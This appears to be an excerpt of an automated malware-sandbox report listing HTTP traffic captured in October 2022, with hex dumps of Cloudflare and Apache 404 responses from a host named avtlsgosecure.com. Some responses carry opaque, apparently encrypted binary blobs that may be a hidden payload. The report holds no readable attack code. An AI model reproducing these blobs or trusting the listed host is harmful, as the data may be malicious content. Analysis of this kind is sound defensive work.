13 d9 7b 64 58 c5 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 ec 4d 1a 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c1 f6 ff 78 b3 56 db c4 0d 13 13 0f 68 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ea f1 96 be 21 51 61 f7 ec 3b 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 0b 7a e5 0e f4 eb 7e 71 eb a0 f6 1a e0 30 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 eb 2e b9 5a e0 cc 23 92 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f ab 9d cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d a7 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 23 e9 de 8e 82 11 e8 e4 1f da a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 94 6f 84 1f d4 fc 69 91 9c 65 07 f1 2c d6 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 44 12 8a 8b e1 42 79 d7 9c 24 c2 e0 2b 7d b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 13 3d f5 52 48 14 3e 96 4d d5 e7 17 3f 5c e1 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*BsF5|]Pu0q3|>YWh;sQqdd =XRcH)M_l{dX3Ob>!ZC:>MwSSP*{~xVh$Oa~i~]DzN,!Qa;|(kJk?a]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dN2KNRRLRekgNeV4b%2Fz2Ol93bzi0ht6P1F9WvwLx3MpxFevNfnauDQCn%2BXcJyYgAuEXqt%2B9GmAb8ExwUiahlOYCPkualScJb7jQTwfJEhe4RKMW3zctEqwK1rr4XIz5yZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdabba30716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sw1wBG91n04tfI1nMl23%2F9SZD5BlckR0tZCJhq8kf0DDiVe%2FUx%2BPeveymWMF9BbvWRMEMbkRUmTQwx74w5ZTMofAkc03YjNzBSB4YMZNkqn3WXuzLF24qHKyKOQ3U8ePPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cdc6dd40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 33 39 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc 28 6a ac 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 31 3d 33 d1 b2 77 45 7c 1f 57 44 7d 42 f7 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed f5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 1b cf e7 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 95 18 a9 a0 ed 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 55 a0 1a bf 76 34 fd f8 12 37 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb f0 b3 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 83 f0 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 50 9e fc 9d 7f 5f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 c1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 68 99 85 1f d4 3c 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 92 68 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e1 7f e3 52 48 c4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 51 2c fd d4 5f 49 6a 43 9c d3 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d Data Ascii: 4393`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j(jS5sj1=3wE|WD}B<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{/a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tp5mXNxwR9fmWtX%2Fdi2xhdLiXe46SJbmILKqD4at0aDTutWJPqK2MxsMmSeF8K8kIjhGO9GdPUygYHNsCTs45dLqhesSCIbpH4AL3%2FbjHZXY%2BxWWP9Jobi%2FU4dYUgifOSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf02da80716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=96YZWi58%2Fxd0XPFczlcj7a48R%2F0pQmV73bKEREgezNFj1cKCnQeUHLRDzs5clkOyUj1xsUCGsxZanaSrYtBsUarjjoqE9C%2BexUsMgXPAjc5Gll5X7bGIRVJebaN0ffGxAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979cf1afc40716-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:59 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 35 32 32 0d 0a 53 00 00 00 8f 3b 45 30 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
